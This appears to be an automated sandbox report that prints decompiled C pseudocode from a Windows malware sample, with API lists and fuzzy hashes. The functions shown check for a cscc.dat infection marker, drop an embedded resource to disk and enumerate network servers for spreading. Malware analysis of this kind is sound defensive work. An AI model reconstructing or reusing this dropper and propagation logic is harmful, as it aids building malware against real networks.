                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                              					_t31 =  *(_t21 + 4);
                                                                                                                                                              					_t27 =  *0x4e37b88;
                                                                                                                                                              					_v12 =  *_t21;
                                                                                                                                                              					_v8 =  *0x4e37bb8;
                                                                                                                                                              					_t10 =  *0x4e37b80;
                                                                                                                                                              					_t37 = _t10;
                                                                                                                                                              					if(_t10 == 0 || E04E29F7A(__ecx, _t37, _t31, _t10) == 0) {
                                                                                                                                                              						_t39 = _t27;
                                                                                                                                                              						if(_t27 == 0 || E04E298AB(_t39, _t31, _t27) == 0) {
                                                                                                                                                              							if(_v12 != 0) {
                                                                                                                                                              								_t16 = E04E29534(_t31, 0, 0, 0); // executed
                                                                                                                                                              								if(_t16 != 0) {
                                                                                                                                                              									goto L7;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							goto L7;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						L7:
                                                                                                                                                              						E04E26B5F(_t31, _v8, 0);
                                                                                                                                                              					}
                                                                                                                                                              					HeapFree(GetProcessHeap(), 0, _t31);
                                                                                                                                                              					HeapFree(GetProcessHeap(), 0, _t21);
                                                                                                                                                              				}
                                                                                                                                                              				return 0;
                                                                                                                                                              			}










                                                                                                                                                              0x04e2a11c
                                                                                                                                                              0x04e2a123
                                                                                                                                                              0x04e2a127
                                                                                                                                                              0x04e2a12a
                                                                                                                                                              0x04e2a130
                                                                                                                                                              0x04e2a139
                                                                                                                                                              0x04e2a13d
                                                                                                                                                              0x04e2a142
                                                                                                                                                              0x04e2a144
                                                                                                                                                              0x04e2a151
                                                                                                                                                              0x04e2a153
                                                                                                                                                              0x04e2a166
                                                                                                                                                              0x04e2a16c
                                                                                                                                                              0x04e2a173
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a173
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2a175
                                                                                                                                                              0x04e2a175
                                                                                                                                                              0x04e2a17d
                                                                                                                                                              0x04e2a17d
                                                                                                                                                              0x04e2a194
                                                                                                                                                              0x04e2a19c
                                                                                                                                                              0x04e2a19c
                                                                                                                                                              0x04e2a1a6

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04E2A18B
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E2A194
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 04E2A199
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E2A19C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$FreeProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3859560861-0
                                                                                                                                                              • Opcode ID: 514296fda612a6060e778abffe7d78455c6473cd2ac41bfa335a8679da7a9381
                                                                                                                                                              • Instruction ID: 285ef90f7f7fc2a947a54d56ab304dbc7d093fc8ea18d103953bbc0cd1cd8b99
                                                                                                                                                              • Opcode Fuzzy Hash: 514296fda612a6060e778abffe7d78455c6473cd2ac41bfa335a8679da7a9381
                                                                                                                                                              • Instruction Fuzzy Hash: C211C2B26003296BE711AB6AAE44F2B77ACEB84735F041225FD04E3244E730FD00CAB1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E04E27E8E(void* __ecx, void* __eflags) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				short _v1572;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				int _t12;
                                                                                                                                                              				signed int _t16;
                                                                                                                                                              				void* _t20;
                                                                                                                                                              				int _t22;
                                                                                                                                                              				void* _t26;
                                                                                                                                                              				int _t27;
                                                                                                                                                              
                                                                                                                                                              				_t26 = __ecx;
                                                                                                                                                              				_t27 = 0;
                                                                                                                                                              				if(E04E27E69( &_v1572) == 0) {
                                                                                                                                                              					L4:
                                                                                                                                                              					return _t27;
                                                                                                                                                              				}
                                                                                                                                                              				_t12 = PathFileExistsW( &_v1572); // executed
                                                                                                                                                              				if(_t12 != 0) {
                                                                                                                                                              					ExitProcess(0);
                                                                                                                                                              				}
                                                                                                                                                              				_t16 = E04E26F7C(_t26, GetCurrentProcess());
                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                              				_t20 = E04E28313( ~( ~_t16) + 7,  &_v12,  &_v8); // executed
                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                              					_t22 = E04E287E7(_v8,  &_v1572, _v12); // executed
                                                                                                                                                              					_t27 = _t22;
                                                                                                                                                              				}
                                                                                                                                                              				goto L4;
                                                                                                                                                              			}













                                                                                                                                                              0x04e27e8e
                                                                                                                                                              0x04e27e9f
                                                                                                                                                              0x04e27ea8
                                                                                                                                                              0x04e27ef7
                                                                                                                                                              0x04e27efb
                                                                                                                                                              0x04e27efb
                                                                                                                                                              0x04e27eb1
                                                                                                                                                              0x04e27eb9
                                                                                                                                                              0x04e27efd
                                                                                                                                                              0x04e27efd
                                                                                                                                                              0x04e27eca
                                                                                                                                                              0x04e27ed1
                                                                                                                                                              0x04e27ed8
                                                                                                                                                              0x04e27edf
                                                                                                                                                              0x04e27eef
                                                                                                                                                              0x04e27ef4
                                                                                                                                                              0x04e27ef6
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 04E27E69: PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,04E27EA6,?), ref: 04E27E7C
                                                                                                                                                              • PathFileExistsW.KERNELBASE(?,?), ref: 04E27EB1
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 04E27EC3
                                                                                                                                                                • Part of subcall function 04E26F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04E27170,00000000,?,04E27AF8), ref: 04E26F8E
                                                                                                                                                                • Part of subcall function 04E26F7C: GetProcAddress.KERNEL32(00000000), ref: 04E26F95
                                                                                                                                                                • Part of subcall function 04E28313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 04E2832A
                                                                                                                                                                • Part of subcall function 04E28313: LoadResource.KERNEL32(00000000), ref: 04E28341
                                                                                                                                                                • Part of subcall function 04E28313: LockResource.KERNEL32(00000000), ref: 04E28350
                                                                                                                                                                • Part of subcall function 04E28313: SizeofResource.KERNEL32(00000000), ref: 04E28368
                                                                                                                                                                • Part of subcall function 04E28313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 04E28384
                                                                                                                                                                • Part of subcall function 04E28313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 04E2838D
                                                                                                                                                                • Part of subcall function 04E28313: memcpy.MSVCRT ref: 04E2839C
                                                                                                                                                                • Part of subcall function 04E28313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 04E283B9
                                                                                                                                                                • Part of subcall function 04E28313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 04E283BC
                                                                                                                                                                • Part of subcall function 04E28313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 04E2840A
                                                                                                                                                                • Part of subcall function 04E28313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 04E2840D
                                                                                                                                                                • Part of subcall function 04E287E7: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,04E211BB,?,?), ref: 04E287FC
                                                                                                                                                                • Part of subcall function 04E287E7: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,04E211BB,?,?), ref: 04E28813
                                                                                                                                                                • Part of subcall function 04E287E7: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,04E211BB,?,?), ref: 04E28824
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 04E27EFD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$Resource$File$AllocateFindPath$AddressChangeCloseCombineCreateCurrentExistsExitFreeHandleLoadLockModuleNotificationProcSizeofWritememcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 706652641-0
                                                                                                                                                              • Opcode ID: bb63c3d07e7bd334c7b8c871d67810eb0d34585906e805910c1918f6cab16f7d
                                                                                                                                                              • Instruction ID: efe37eba9144d7dc9239ed6adbedc82a1411c9e9daa27c10b9e40e923817dcef
                                                                                                                                                              • Opcode Fuzzy Hash: bb63c3d07e7bd334c7b8c871d67810eb0d34585906e805910c1918f6cab16f7d
                                                                                                                                                              • Instruction Fuzzy Hash: 31F0447290012AA7EF20AFF1DE44DDEB3ADEF08249F041155A601D2540E635EE058661
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E26FAF(long __ebx, long _a4, void* _a8) {
                                                                                                                                                              				void* _t6;
                                                                                                                                                              				int _t9;
                                                                                                                                                              				void* _t12;
                                                                                                                                                              				struct _OVERLAPPED* _t13;
                                                                                                                                                              
                                                                                                                                                              				_t13 = 0;
                                                                                                                                                              				_t6 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 2, 0); // executed
                                                                                                                                                              				_t12 = _t6;
                                                                                                                                                              				if(_t12 != 0xffffffff) {
                                                                                                                                                              					_a4 = 0;
                                                                                                                                                              					_t9 = WriteFile(_t12, _a8, __ebx,  &_a4, 0); // executed
                                                                                                                                                              					if(_t9 != 0 && __ebx == _a4) {
                                                                                                                                                              						_t13 = 1;
                                                                                                                                                              					}
                                                                                                                                                              					CloseHandle(_t12);
                                                                                                                                                              				}
                                                                                                                                                              				return _t13;
                                                                                                                                                              			}







                                                                                                                                                              0x04e26fb4
                                                                                                                                                              0x04e26fc5
                                                                                                                                                              0x04e26fcb
                                                                                                                                                              0x04e26fd0
                                                                                                                                                              0x04e26fdb
                                                                                                                                                              0x04e26fdf
                                                                                                                                                              0x04e26fe7
                                                                                                                                                              0x04e26fee
                                                                                                                                                              0x04e26fee
                                                                                                                                                              0x04e26ff0
                                                                                                                                                              0x04e26ff0
                                                                                                                                                              0x04e26ffb

                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,04E27201,?,?,?,04E27AF8), ref: 04E26FC5
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,04E27201,?,?,?,04E27AF8), ref: 04E26FDF
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,04E27201,?,?,?,04E27AF8), ref: 04E26FF0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1065093856-0
                                                                                                                                                              • Opcode ID: 573ee962af589f1b1e798de56fdc0f71f866115cdb11b428097e050f52c0ba94
                                                                                                                                                              • Instruction ID: 1ff6f2668055be8cc1f3bf01572fab557eaeea38eb29da8a0a9a7a27837b0a8d
                                                                                                                                                              • Opcode Fuzzy Hash: 573ee962af589f1b1e798de56fdc0f71f866115cdb11b428097e050f52c0ba94
                                                                                                                                                              • Instruction Fuzzy Hash: 3CF0F8322011287AEB305E66ED4CEABBE6CEB46BF5F108212FE0986190C631D941D6E0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E287E7(long __ebx, long _a4, void* _a8) {
                                                                                                                                                              				void* _t5;
                                                                                                                                                              				int _t8;
                                                                                                                                                              				void* _t11;
                                                                                                                                                              				struct _OVERLAPPED* _t12;
                                                                                                                                                              
                                                                                                                                                              				_t12 = 0;
                                                                                                                                                              				_t5 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                              				_t11 = _t5;
                                                                                                                                                              				if(_t11 != 0xffffffff) {
                                                                                                                                                              					_t8 = WriteFile(_t11, _a8, __ebx,  &_a4, 0); // executed
                                                                                                                                                              					if(_t8 != 0 && _a4 == __ebx) {
                                                                                                                                                              						_t12 = 1;
                                                                                                                                                              					}
                                                                                                                                                              					FindCloseChangeNotification(_t11); // executed
                                                                                                                                                              				}
                                                                                                                                                              				return _t12;
                                                                                                                                                              			}







                                                                                                                                                              0x04e287ec
                                                                                                                                                              0x04e287fc
                                                                                                                                                              0x04e28802
                                                                                                                                                              0x04e28807
                                                                                                                                                              0x04e28813
                                                                                                                                                              0x04e2881b
                                                                                                                                                              0x04e28822
                                                                                                                                                              0x04e28822
                                                                                                                                                              0x04e28824
                                                                                                                                                              0x04e28824
                                                                                                                                                              0x04e2882f

                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,04E211BB,?,?), ref: 04E287FC
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,04E211BB,?,?), ref: 04E28813
                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,04E211BB,?,?), ref: 04E28824
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3805958096-0
                                                                                                                                                              • Opcode ID: dbbf8b7b29b704c4612458c7e5f9d66dbceefc91fc6fa3542ae83a14273c2054
                                                                                                                                                              • Instruction ID: f3e6f7d463e027edda3a6f71171d0942d78d3f455da9f4bbf3bce1f983110a10
                                                                                                                                                              • Opcode Fuzzy Hash: dbbf8b7b29b704c4612458c7e5f9d66dbceefc91fc6fa3542ae83a14273c2054
                                                                                                                                                              • Instruction Fuzzy Hash: B4F01C32201024BBD7342E66ED4CEEB7E6CEF866F6B048225FA0981054D635D952D6E1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E04E2751B(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				void* _v20;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				void** _t30;
                                                                                                                                                              				void* _t40;
                                                                                                                                                              				void* _t42;
                                                                                                                                                              				intOrPtr* _t43;
                                                                                                                                                              				void* _t44;
                                                                                                                                                              
                                                                                                                                                              				_t44 = 0;
                                                                                                                                                              				_t30 =  &_v8;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				_v20 = 0;
                                                                                                                                                              				_v16 = 0;
                                                                                                                                                              				__imp__NetServerEnum(0, 0x65, _t30, 0xffffffff,  &_v12,  &_v20, _a8, _a12,  &_v16); // executed
                                                                                                                                                              				if(_t30 == 0 || _t30 == 0xea) {
                                                                                                                                                              					_t42 = _v8;
                                                                                                                                                              					_a12 = 1;
                                                                                                                                                              					if(_t42 == _t44) {
                                                                                                                                                              						goto L16;
                                                                                                                                                              					}
                                                                                                                                                              					_t40 = 0;
                                                                                                                                                              					if(_v12 <= _t44) {
                                                                                                                                                              						L13:
                                                                                                                                                              						goto L14;
                                                                                                                                                              					}
                                                                                                                                                              					_t43 = _t42 + 4;
                                                                                                                                                              					while(_t43 != 4) {
                                                                                                                                                              						if(( *(_t43 + 0xc) & 0x80000000) == 0) {
                                                                                                                                                              							if( *((intOrPtr*)(_t43 - 4)) == 0x1f4 && ( *(_t43 + 4) & 0x0000000f) > 4) {
                                                                                                                                                              								_t44 = 0;
                                                                                                                                                              								E04E26B95( *_t43, 0, _a4);
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							E04E2751B(_a4, 3,  *_t43);
                                                                                                                                                              						}
                                                                                                                                                              						_t43 = _t43 + 0x18;
                                                                                                                                                              						_t40 = _t40 + 1;
                                                                                                                                                              						if(_t40 < _v12) {
                                                                                                                                                              							continue;
                                                                                                                                                              						} else {
                                                                                                                                                              							goto L13;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					goto L13;
                                                                                                                                                              				} else {
                                                                                                                                                              					_a12 = 0;
                                                                                                                                                              					L14:
                                                                                                                                                              					if(_v8 != _t44) {
                                                                                                                                                              						NetApiBufferFree(_v8);
                                                                                                                                                              					}
                                                                                                                                                              					L16:
                                                                                                                                                              					return _a12;
                                                                                                                                                              				}
                                                                                                                                                              			}













                                                                                                                                                              0x04e27530
                                                                                                                                                              0x04e27539
                                                                                                                                                              0x04e27540
                                                                                                                                                              0x04e27543
                                                                                                                                                              0x04e27546
                                                                                                                                                              0x04e27549
                                                                                                                                                              0x04e2754c
                                                                                                                                                              0x04e27554
                                                                                                                                                              0x04e27562
                                                                                                                                                              0x04e27565
                                                                                                                                                              0x04e2756e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e27571
                                                                                                                                                              0x04e27576
                                                                                                                                                              0x04e275c0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e275c0
                                                                                                                                                              0x04e27578
                                                                                                                                                              0x04e2757b
                                                                                                                                                              0x04e27589
                                                                                                                                                              0x04e275a0
                                                                                                                                                              0x04e275b0
                                                                                                                                                              0x04e275b2
                                                                                                                                                              0x04e275b2
                                                                                                                                                              0x04e2758b
                                                                                                                                                              0x04e27592
                                                                                                                                                              0x04e27592
                                                                                                                                                              0x04e275b7
                                                                                                                                                              0x04e275ba
                                                                                                                                                              0x04e275be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e275be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2755d
                                                                                                                                                              0x04e2755d
                                                                                                                                                              0x04e275c1
                                                                                                                                                              0x04e275c4
                                                                                                                                                              0x04e275c9
                                                                                                                                                              0x04e275c9
                                                                                                                                                              0x04e275cf
                                                                                                                                                              0x04e275d5
                                                                                                                                                              0x04e275d5

                                                                                                                                                              APIs
                                                                                                                                                              • NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,?,?,?,?), ref: 04E2754C
                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 04E275C9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BufferEnumFreeServer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2429717511-0
                                                                                                                                                              • Opcode ID: 39636c943c6147b3b1612fdf52f1d616dcbf3eb604a7bd2da955d42ae0f4290c
                                                                                                                                                              • Instruction ID: 91acb74a9a82447a91ed873b3d0c8de75dc1977896310567f26ad974f74443cd
                                                                                                                                                              • Opcode Fuzzy Hash: 39636c943c6147b3b1612fdf52f1d616dcbf3eb604a7bd2da955d42ae0f4290c
                                                                                                                                                              • Instruction Fuzzy Hash: 9B215E76D4022AEBDB21CF94CE40AEEFB79FF04714F105516F811A6184E371A750DB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                              			E04E27DD0(void* __ecx, signed int* _a4, signed int* _a8, signed int* _a12, signed int* _a16) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				signed int _t17;
                                                                                                                                                              				void** _t19;
                                                                                                                                                              				void* _t20;
                                                                                                                                                              				signed int _t22;
                                                                                                                                                              				signed int* _t23;
                                                                                                                                                              				signed int* _t24;
                                                                                                                                                              				void* _t26;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              				signed int _t31;
                                                                                                                                                              				signed int _t32;
                                                                                                                                                              				signed int* _t35;
                                                                                                                                                              				signed int* _t36;
                                                                                                                                                              				void* _t38;
                                                                                                                                                              				signed int _t39;
                                                                                                                                                              				signed int _t41;
                                                                                                                                                              				signed int _t42;
                                                                                                                                                              
                                                                                                                                                              				_t17 = E04E26477();
                                                                                                                                                              				_t39 = _t17;
                                                                                                                                                              				_t19 =  &_v8;
                                                                                                                                                              				asm("sbb esi, esi");
                                                                                                                                                              				_t27 = 0;
                                                                                                                                                              				_t2 = _t39 - 0x1e; // -30
                                                                                                                                                              				_t42 = _t41 & _t2;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				__imp__NetServerGetInfo(0, 0x65, _t19, 0x1e, _t38, _t41, _t26, __ecx); // executed
                                                                                                                                                              				_t20 = _v8;
                                                                                                                                                              				if(_t19 == 0 && ( *(_t20 + 0x10) & 0x00000018) != 0) {
                                                                                                                                                              					_t27 = 1;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                              					NetApiBufferFree(_t20);
                                                                                                                                                              				}
                                                                                                                                                              				if(_t27 != 0) {
                                                                                                                                                              					_t39 = _t39 + 0xf;
                                                                                                                                                              				}
                                                                                                                                                              				_t31 = 3;
                                                                                                                                                              				_t22 = _t39 / _t31;
                                                                                                                                                              				_t32 = 0xf;
                                                                                                                                                              				if(_t39 <= 0x1e) {
                                                                                                                                                              					_t12 = _t39 - 0xf; // -30
                                                                                                                                                              					asm("sbb ecx, ecx");
                                                                                                                                                              					_t32 = _t32 & _t12;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t39 > 0xf) {
                                                                                                                                                              					_t39 = 0xf;
                                                                                                                                                              				}
                                                                                                                                                              				_t35 = _a4;
                                                                                                                                                              				if(_t35 != 0) {
                                                                                                                                                              					 *_t35 = _t42;
                                                                                                                                                              				}
                                                                                                                                                              				_t36 = _a12;
                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                              					 *_t36 = _t22;
                                                                                                                                                              				}
                                                                                                                                                              				_t23 = _a16;
                                                                                                                                                              				if(_t23 != 0) {
                                                                                                                                                              					 *_t23 = _t32;
                                                                                                                                                              				}
                                                                                                                                                              				_t24 = _a8;
                                                                                                                                                              				if(_t24 != 0) {
                                                                                                                                                              					 *_t24 = _t39;
                                                                                                                                                              				}
                                                                                                                                                              				return _t24;
                                                                                                                                                              			}




















                                                                                                                                                              0x04e27dd7
                                                                                                                                                              0x04e27dde
                                                                                                                                                              0x04e27de3
                                                                                                                                                              0x04e27de7
                                                                                                                                                              0x04e27de9
                                                                                                                                                              0x04e27ded
                                                                                                                                                              0x04e27df1
                                                                                                                                                              0x04e27df3
                                                                                                                                                              0x04e27df6
                                                                                                                                                              0x04e27dfe
                                                                                                                                                              0x04e27e01
                                                                                                                                                              0x04e27e09
                                                                                                                                                              0x04e27e09
                                                                                                                                                              0x04e27e0c
                                                                                                                                                              0x04e27e0f
                                                                                                                                                              0x04e27e0f
                                                                                                                                                              0x04e27e17
                                                                                                                                                              0x04e27e19
                                                                                                                                                              0x04e27e19
                                                                                                                                                              0x04e27e1e
                                                                                                                                                              0x04e27e23
                                                                                                                                                              0x04e27e27
                                                                                                                                                              0x04e27e2b
                                                                                                                                                              0x04e27e2f
                                                                                                                                                              0x04e27e32
                                                                                                                                                              0x04e27e34
                                                                                                                                                              0x04e27e34
                                                                                                                                                              0x04e27e39
                                                                                                                                                              0x04e27e3d
                                                                                                                                                              0x04e27e3d
                                                                                                                                                              0x04e27e3e
                                                                                                                                                              0x04e27e43
                                                                                                                                                              0x04e27e45
                                                                                                                                                              0x04e27e45
                                                                                                                                                              0x04e27e47
                                                                                                                                                              0x04e27e4c
                                                                                                                                                              0x04e27e4e
                                                                                                                                                              0x04e27e4e
                                                                                                                                                              0x04e27e50
                                                                                                                                                              0x04e27e55
                                                                                                                                                              0x04e27e57
                                                                                                                                                              0x04e27e57
                                                                                                                                                              0x04e27e59
                                                                                                                                                              0x04e27e5e
                                                                                                                                                              0x04e27e60
                                                                                                                                                              0x04e27e60
                                                                                                                                                              0x04e27e66

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 04E26477: GetTickCount.KERNEL32 ref: 04E26477
                                                                                                                                                              • NetServerGetInfo.NETAPI32(00000000,00000065,?,?,?,00000000,?,?,04E27AA3,?,?,000000FF,?,?), ref: 04E27DF6
                                                                                                                                                              • NetApiBufferFree.NETAPI32(?,?,?,00000000,?,?,04E27AA3,?,?,000000FF,?,?), ref: 04E27E0F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BufferCountFreeInfoServerTick
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2934114180-0
                                                                                                                                                              • Opcode ID: 58b5a1a5ff1b04e62384a05b8ccbfb676c95f173584ebf7b70c223fefc9504b5
                                                                                                                                                              • Instruction ID: 383cb84729bb510fa835f39ced0a40bac747e7df22a2e69b06b7afdbae101f28
                                                                                                                                                              • Opcode Fuzzy Hash: 58b5a1a5ff1b04e62384a05b8ccbfb676c95f173584ebf7b70c223fefc9504b5
